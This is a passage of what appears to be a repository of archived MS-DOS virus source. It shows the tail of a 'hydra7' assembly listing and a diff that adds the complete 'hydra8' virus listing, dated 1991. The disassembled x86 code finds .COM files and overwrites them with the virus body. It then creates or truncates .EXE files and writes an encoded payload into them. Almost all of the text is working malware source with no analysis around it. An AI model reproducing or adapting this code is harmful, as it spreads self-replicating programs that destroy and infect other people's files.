mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_16e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,170h
mov cs:data_9,ax
cmp word ptr ds:data_17e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_12
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,24Eh
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,270h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra7 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra8.asm
+220
View File
@@ -0,0 +1,220 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA8 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: W ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_17e equ 1EFh
data_18e equ 1F2h
data_19e equ 9D9Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra8 proc far
start:
jmp loc_3
db 59h, 44h, 00h, 00h
data_3 db 'HyDra-8 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 18 dup (0)
data_10 db 0
db 10 dup (0)
data_11 db 0
db 0, 0, 0, 0, 0, 0
data_12 db 0
db 0, 0, 0, 0, 0, 0
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_13 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
data_14 db 33h
db 0C9h, 1Eh, 52h,0E8h, 06h, 00h
db 0E8h, 13h, 00h,0EBh, 36h, 90h
db 0BEh, 48h, 01h
db 0BFh, 5Ah, 01h,0B9h, 12h, 00h
locloop_1:
xor byte ptr [si],0F5h
movsb ; Mov [si] to es:[di]
loop locloop_1 ; Loop if cx > 0
retn
db 0B8h, 00h, 0Fh,0CDh, 10h,0B4h
db 00h,0CDh, 10h,0B8h, 00h, 02h
db 0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h
db 33h,0D2h
db 0BAh, 5Ah, 01h,0B4h, 09h,0CDh
db 21h,0B8h, 00h, 02h,0B6h, 18h
db 0B2h, 00h,0CDh, 10h,0C3h
db 0B8h, 00h, 4Ch,0CDh, 21h, 00h
db 0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h
db 0F5h
db 0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h
db 94h, 99h, 81h,0CAh,0D1h
loc_3:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,1EFh
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_4:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,1EFh
mov cs:data_8,ax
cmp word ptr ds:data_18e,4459h
jne loc_5 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_8 ; Jump if carry Set
jmp short loc_4
loc_5:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_6 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_6:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_7:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_11
db 90h
loc_8:
clc ; Clear carry flag
xor cx,cx ; Zero register
push ds
push dx
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov dx,offset data_13
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_9:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_7 ; Jump if carry Set
mov ax,3D02h
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
clc ; Clear carry flag
xor dx,dx ; Zero register
mov ah,40h ; '@'
mov dx,offset data_14
mov cx,5Ah
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
cmp ax,5Ah
jb loc_10 ; Jump if below
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_10 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_9 ; Jump if carry=0
loc_10:
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
loc_11:
xor di,di ; Zero register
mov si,offset data_15
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
data_15 db 1Eh
db 07h,0B9h,0FFh,0FFh,0BEh,0EFh
db 02h,0BFh, 00h, 01h, 2Bh,0CEh
db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h
db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh
db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh
db 2Eh, 00h, 01h,0CDh
db 20h
hydra8 endp
seg_a ends
end start